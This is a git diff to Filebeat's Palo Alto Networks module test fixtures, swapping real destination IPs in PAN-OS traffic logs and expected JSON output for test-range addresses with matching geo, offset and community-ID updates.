-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9923,7 +9370,7 @@
         "event.end": "2012-04-10T04:39:46.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:46.000-02:00",
         "event.timezone": "-02:00",
@@ -9935,10 +9382,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 35934,
+        "log.offset": 35864,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=",
+        "network.community_id": "1:85UBXOVwZbnWWb+ZE7zvB6j8D6o=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -9970,14 +9417,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log
index b02eb5494bbd..293b9334c033 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log
@@ -1,22 +1,22 @@
 535 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7603,1,32801,514,57533,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:27,0,any,0,2825918,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 575 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7835,1,37836,514,31566,514,0x500068,tcp,allow,4185,838,3347,13,2020/03/27 09:57:27,0,computer-and-internet-info,0,2825922,0x0,192.168.0.0-192.168.255.255,Germany,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 535 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,58717,1,38164,514,42028,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:42,0,any,0,2825926,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 534 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6282,1,42905,514,23322,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:42,0,any,0,2825924,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 569 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7223,1,49731,443,23376,443,0x4000e9,tcp,allow,104899,1939,102960,90,2020/03/27 09:57:26,1,government,0,2825919,0x0,192.168.0.0-192.168.255.255,United States,0,16,74,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 522 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.2,192.168.1.2,0.0.0.0,0.0.0.0,Umbrella VA,,,dns,vsys1,Clients,Servers,ethernet1/3,ethernet1/2,Default,2020/03/27 09:57:41,58122,1,54494,53,0,0,0x0,udp,allow,78,78,0,1,2020/03/27 09:57:42,0,any,0,2825927,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,4e328bdc-1e73-4a72-a33c-88c5f4a062a3,0,0,,,,,,,
 541 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:40,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:40,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:40,6477,1,49735,443,54288,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:41,0,any,0,2825915,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 580 <14>1 2020-03-27T09:57:40+01:00 PA-VM - - - - 1,2020/03/27 09:57:40,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:40,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:40,7577,1,59652,443,35333,443,0x1400070,tcp,allow,7053,1538,5515,22,2020/03/27 09:57:26,0,computer-and-internet-info,0,2825914,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 535 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7712,1,34594,514,40984,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:22,0,any,0,2825902,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 538 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,58586,1,39016,514,26342,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:22,0,any,0,2825903,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 532 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7458,1,37455,514,39023,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:37,0,any,0,2825905,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 541 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:37,0,any,0,2825906,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 556 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x1400000,tcp,allow,5451,1305,4146,12,2020/03/27 09:57:37,0,any,0,2825907,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 566 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x1400000,tcp,allow,5451,1305,4146,12,2020/03/27 09:57:37,0,search-engines,0,2825908,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
@@ -27,18 +27,18 @@
 556 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x1400000,tcp,allow,5409,1262,4147,12,2020/03/27 09:57:34,0,any,0,2825892,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 541 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:34,0,any,0,2825891,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 566 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x1400000,tcp,allow,5409,1262,4147,12,2020/03/27 09:57:34,0,search-engines,0,2825893,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 536 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,62253,1,40462,514,21854,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:17,0,any,0,2825876,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 580 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7574,1,59649,443,60066,443,0x1400070,tcp,allow,6398,1533,4865,21,2020/03/27 09:57:17,0,computer-and-internet-info,0,2825879,0x0,192.168.0.0-192.168.255.255,United States,0,10,11,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
